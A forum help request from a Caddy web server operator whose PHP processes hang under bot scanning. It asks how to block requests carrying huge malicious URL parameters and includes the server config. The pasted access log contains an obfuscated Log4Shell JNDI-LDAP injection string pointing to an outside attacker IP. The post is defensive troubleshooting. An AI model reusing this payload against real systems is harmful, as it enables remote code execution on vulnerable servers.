1. The problem I’m having:
We are being spammed by bots looking for vulnerabilities, but unfortunately this is creating PHP processes that remain in a “Getting Connection Information” state and hang. This then rapidly fills the available PHP processes and the whole lot just stops responding to web requests because none of the processes ever complete.
We can see that the main identifier is that a URL is hit with a massive URL parameter starting with something like ?cx=$7B
…
Is there a method to just have Caddy drop anything that looks like that?
2. Error messages and/or full log output:
{"level":"info","ts":1687268912.911088,"logger":"http.log.access.log5","msg":"handled request","request":{"remote_ip":"146.70.45.221","remote_port":"25734","proto":"HTTP/1.1","method":"GET","host":"scotland.redacted.com","uri":"/discover/food-drink?cx=$%7B$%7B:-j%7D$%7B:-n%7D$%7B:-d%7D$%7B:-i%7D:$%7B:-l%7D$%7B:-d%7D$%7B:-a%7D$%7B:-p%7D://143.198.244.73:80/dn=gAAAAABkka4tkNra3aYQj1voDBSasZUdPlP6laGl9fXtWj-3x1wwJkzOzdjX8LOeLLxIr6DLHtL8uIK9brYy6mlxkoS8RB_DLoySmeQSWu2Uvfxdey5KIB5bYbSJ2SNAPfr9ofAH8aSQ5FSI-kH-8ypmUTn0AU2M0l8aU0FpZtGbNpli8f_m2HevItxT9RBZBdUGBD7RfQ4SgkAq-DEgt1HFlhTHuxDH9LTQXSf5zXXmYXKJpC0c_akouddu131kV-kyBjU_XoS8KORKPpFmHmc4uFiUvx69dqOAjKPsrdueZFYKe6HgshQbGpwIC0yckqMW1fKlgzZ6kkWoM3xJXVQLXghxd5gvUUGa7kgZmrV5T6q8Tn3psbzoB6dF5pGzs8V6bPuofNuvn_Z6fpQCs9kIidBVxdJIzMhvBZAG1MfjCguwHAThKHuZDjjaw7DPrtqnW1j1VR6C2K47jK-mISxaGTAFIUh1gY_c1Gk2aCCfNk4nOE22PiL2FrnCF9IdCmaLDu3DJbeKvK4kmg6engx1OOrg9_bzl0xGjtAAhnJDGFl3TppwV9pK8agggQnAD6yhJfjlQd-rNZMSSrx_LDZg4nweV82XTj3O2I2jYaGCDA8plsnbzZH1bKk7JhkLneFxww1sThNHoEKVeb9tNaonahkegQK02r5gbgA6JUrQjVpfI1HgaXhRiCy6Sadm4dhJYw-ZXvCEYJTLrv9kloelNdftwdLu5qSXb1IC5HqMaEmKUVFJ47XaeZsd9xS1byGzmk2X3h1VMb0A-gyhQQXF3u3h52DkcLBEPqOR3qmKBJII9Lqwpruwg0qqFh-mYR6XDtSGMsS5v_C5B-wYijeWCiQyaIX5ND5Q18OiNDExskkrmxJl-WMO4SNcBS2C6yYsEMukEbpzhCmC0LcRVTHCc2uAoeYSEPhITMWb4Y01SvkhWAsHqEoXXHaHRAExcmtX1I5Hf8NJapJKmw5wFXIu0c5Gqs0FcHgwNtOIucmRIzrfgoEC3FOZlAbuUEGUxWMWODPpxDdXLzrPV5ZW2mxwRrGyGsWZbBBuIYCg0coXqJMMZzLWzT3b0vxLPSsDjVISbBZH19cbnzCtHqBT6p6bI9GEBTyX5sLomjC9Os_RSfXwoxKinFJyK0OJ2kerD1CK80qR98tIqkYAJKwx3hicjUhOt4G95JXBoBT6-rrxTX2iIb7v9SwLRL51lSUhi30zHGR55We_Y-NEOWIutNH5WJ-anv5jCK-jkPLrcPhgLVYvcx7FIdDtmqabKaSFk_LHEFDH0yZUFmWHcJuhoossVMaTPa3901zmbZGbg6MJDd6IdqPAthk9Sg0CQ0OR_QXms984kxOv3mApLd4jk4efdcg4u7wGdq9ydk5ws0eGz9NiTWEEpe4-np8BZVnqm8GiKf3NbZmRuqcjxmeuhwT0tvNlB2nIcULdWLBS34raHKoXB7mDz3txtmmUsAt6J2BMLBJhNpj0Y2Hzt4uoNo5BuwVnPQ4J7mjumhgs21A8t0KzJpzph1h4-sJMC5Yk2iwOwaa6uzITNGaG2qFKesxnq7VAlAfhULbm0HmQESjEsJC1Xx9fk9T89HWehWQWZNTNytQosoAL%7D","headers":{"User-Agent":["python-requests/2.31.0"],"Accept-Encoding":["gzip, deflate"],"Accept":["*/*"],"Connection":["keep-alive"]},"tls":{"resumed":false,"version":772,"cipher_suite":4865,"proto":"http/1.1","server_name":"scotland.redacted.com"}},"user_id":"","duration":2.103405375,"size":10138,"status":200,"resp_headers":{"Set-Cookie":[],"Pragma":["no-cache"],"X-Robots-Tag":["all"],"Server":["Caddy"],"Alt-Svc":["h3=\":443\"; ma=2592000"],"Expires":["Thu, 19 Nov 1981 08:52:00 GMT"],"Cache-Control":["no-store, no-cache, must-revalidate"],"Content-Type":["text/html; charset=UTF-8"],"Referrer-Policy":["no-referrer-when-downgrade"],"Content-Encoding":["gzip"],"Vary":["Accept-Encoding"],"Link":["<https://scotland.redacted.com/discover/food-drink>; rel='canonical'"],"X-Powered-By":["Craft CMS"]}}
3. Caddy version:
v2.6.4 h1:2hwYqiRwk1tf3VruhMpLcYTg+11fCdr8S3jhNAdnPy8=
4. How I installed and ran Caddy:
n/a
a. System environment:
Ubuntu 22.04 LTS
b. Command:
n/a
c. Service/unit/compose file:
n/a
d. My complete Caddy config:
redacted.com,
scotland.redacted.com,
north.redacted.com,
south.redacted.com {
root * /websites/redacted/web
encode gzip zstd
log {
output file /websites/_logs/redacted.log
}
php_fastcgi unix//run/php/php8.1-fpm.sock
file_server
}